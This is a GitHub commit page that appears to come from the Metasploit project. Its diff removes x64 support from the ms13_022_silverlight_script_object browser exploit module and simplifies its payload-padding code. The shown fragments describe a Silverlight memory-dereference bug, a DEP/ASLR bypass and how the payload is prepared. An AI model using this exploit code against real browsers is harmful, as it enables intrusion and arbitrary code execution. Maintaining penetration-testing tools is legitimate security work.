Skip to content

Commit

Permalink
Land #4798, @wchen-r7's deletion of x64 support on ms13_022_silverlig…
Browse files Browse the repository at this point in the history
…ht_script_object

* Ungenuine support, well deleted
  • Loading branch information
jvazquez-r7 committed Feb 21, 2015
2 parents 4097222 + ef99022 commit ef62e1f
Showing 1 changed file with 5 additions and 16 deletions.
Original file line number Diff line number Diff line change
Expand Up @@ -28,7 +28,7 @@ def initialize(info={})
to dereference arbitrary memory which easily leverages to arbitrary code execution. In order
to bypass DEP/ASLR a second vulnerability is used, in the public WriteableBitmap class
from System.Windows.dll. This module has been tested successfully on IE6 - IE10, Windows XP
SP3 / Windows 7 SP1 on both x32 and x64 architectures.
SP3 / Windows 7 SP1.
},
'License' => MSF_LICENSE,
'Author' =>
Expand All @@ -55,7 +55,7 @@ def initialize(info={})
'EXITFUNC' => 'thread'
},
'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X86_64],
'Arch' => ARCH_X86,
'BrowserRequirements' =>
{
:source => /script|headers/i,
Expand All @@ -65,16 +65,7 @@ def initialize(info={})
},
'Targets' =>
[
[ 'Windows x86',
{
'arch' => ARCH_X86
}
],
[ 'Windows x64',
{
'arch' => ARCH_X86_64
}
]
[ 'Windows x86/x64', {} ]
],
'Privileged' => false,
'DisclosureDate' => "Mar 12 2013",
Expand All @@ -96,10 +87,8 @@ def exploit_template(cli, target_info)
my_payload = get_payload(cli, target_info)

# Align to 4 bytes the x86 payload
if target_info[:arch] == ARCH_X86
while my_payload.length % 4 != 0
my_payload = "\x90" + my_payload
end
while my_payload.length % 4 != 0
my_payload = "\x90" + my_payload
end

my_payload = Rex::Text.encode_base64(my_payload)
Expand Down

0 comments on commit ef62e1f

Please sign in to comment.